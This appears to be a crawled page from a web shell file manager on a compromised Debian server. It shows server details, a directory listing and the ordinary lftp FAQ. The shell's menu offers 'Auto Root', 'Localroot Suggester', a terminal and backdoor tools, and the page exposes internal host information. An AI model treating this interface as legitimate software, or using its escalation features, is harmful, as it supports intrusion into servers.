Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
lftp /
Delete
Unzip
Name
Size
Permission
Date
Action
BUGS
169
B
-rw-r--r--
2017-10-03 08:37
FAQ
2.07
KB
-rw-r--r--
2017-03-16 13:34
README.debug-levels
1.71
KB
-rw-r--r--
2013-03-19 12:25
README.gz
3.41
KB
-rw-r--r--
2016-02-20 13:57
README.modules
1.37
KB
-rw-r--r--
2013-03-19 12:25
TODO
1.78
KB
-rw-r--r--
2019-03-23 18:57
changelog.Debian.amd64.gz
222
B
-rw-r--r--
2022-07-27 00:33
changelog.Debian.gz
12.4
KB
-rw-r--r--
2022-07-27 00:33
changelog.gz
32.79
KB
-rw-r--r--
2020-08-13 19:30
copyright
642
B
-rw-r--r--
2022-07-16 10:24
Save
Rename
Q: I have compile/link problems. A: Some common installation problems are described in the INSTALL file. If your case is not covered, please send a problem report. Q: How can I see the greeting message from the server? A: Try `debug 3'. It is disabled by default to keep the screen clear in case of several simultaneous connections. Q: Why doesn't lftp download files like this: `lftp ftp://host/path/file'? A: It expects an URL of a directory. To download a file use `lftpget URL'. Q: What is the %2F in ftp URL's? A: RFC1738 specifies that clients handling ftp URL's should interpret them as HOME relative by default. %2F stands for leading slash pointing to the root directory. Q: Why do the secure protocols https and ftps give the "PRNG not seeded" error message? A: Your system probably lacks a /dev/random-like device. Create a ~/.rnd file containing random characters and SSL will work. See also the OpenSSL FAQ about this. Q: Why does lftp say that locking fails all the time? (on linux) A: You have compiled lftp with large file support (>2G) but your kernel does not support 64-bit file-locking. Either install a better kernel (e.g. linux-2.4.x) or compile lftp without large file support (configure --disable-largefile) Q: Where is lls? A: !ls Q: Why doesn't `mirror' download files starting with a dot (or re-uploads them all the time)? I can see the files on the server using `ls -a'. A: Try `set ftp:list-options -a'. Q: ^Z doesn't work in Cygwin. A: Use "SET CYGWIN=TTY". This must be done before starting a shell, if any. Q: lftp consumes 100% CPU on MacOS X Tiger just waiting at the command prompt. A: See http://www.mail-archive.com/lftp%40uniyar.ac.ru/msg02101.html for a workaround for MacOS X bug. Q: lftp hangs in "Making data connection" state. A: Try "set ftp:prefer-epsv no". Probably a router on the path to the server does not recognize the EPSV command. Q: ssl:key-file setting is not applied to sftp and fish connections. A: Use sftp:connect-program and fish:connect-program settings instead, e.g.: "ssh -a -x -i path-to-key-file"